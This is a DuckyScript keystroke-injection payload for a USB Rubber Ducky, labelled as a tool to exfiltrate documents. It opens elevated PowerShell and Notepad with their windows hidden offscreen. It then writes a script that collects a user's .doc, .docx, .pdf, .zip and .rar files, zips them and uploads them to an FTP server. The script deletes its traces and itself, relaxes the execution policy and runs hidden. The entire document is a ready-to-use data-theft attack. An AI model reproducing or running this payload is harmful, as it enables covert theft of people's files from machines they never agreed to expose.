REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord) REM Description: Exfiltrate documents and upload them to a ftp server. REM Version: 1.0 REM Category: Exfiltration DELAY 800 GUI r DELAY 1000 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 800 ALT y DELAY 800 ENTER ALT SPACE DELAY 1000 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report + "

Duck Tool Kit Report



Generated on: $Date


" ENTER STRING $Report = $Report + '

User Documents (doc,docx,pdf,rar)

' ENTER STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) ENTER STRING $Report = $Report + '
' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $final = 'C:\Windows\Report.zip' ENTER STRING $ftpAddr = "ftp://username:password@ftp.host.com/Report.zip" ENTER STRING $browser = New-Object System.Net.WebClient ENTER STRING $url = New-Object System.Uri($ftpAddr) ENTER STRING $browser.UploadFile($url, $final) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING remove-item 'C:\Windows\Report.zip' ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL s DELAY 800 STRING C:\Windows\config-58477.ps1 ENTER DELAY 1000 ALT F4 DELAY 800 GUI r DELAY 800 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 800 ALT y DELAY 1000 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 800 STRING m DELAY 1000 DOWNARROW REPEAT 100 ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 800 STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1 ENTER